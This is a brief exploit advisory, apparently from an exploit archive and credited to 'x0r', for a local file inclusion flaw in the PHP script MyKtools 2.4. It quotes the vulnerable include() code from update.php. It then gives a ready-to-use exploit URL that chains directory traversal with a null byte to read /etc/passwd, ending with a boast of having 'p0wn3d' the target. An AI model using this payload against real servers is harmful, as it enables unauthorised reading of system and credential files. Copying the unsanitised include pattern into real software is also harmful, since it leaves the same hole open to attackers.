MyKtools version 2.4 suffers from a local file inclusion vulnerability.
bce61fb6911b802f6c41f9c6e46404303083734196b70af885a7bae403c7c022
##############
# Autor: x0r
#
# Email: evolutionteam.x0[at]gmail[dot]com
#
# Download: http://www.easy-script.com/scripts-dl/MyKtools-v2-4.zip
#
# Bug: LFI
##############
Bug:
In \update.php
// Include du fichier langue
if ($_GET['langage'])
{
$langue = $_GET['langage'];
include ("lang/".$langue.".php");
}
Exploit: \update.php?langage=../../../../../../etc/passwd%00
p0wn3d Beby.
-=EOF=-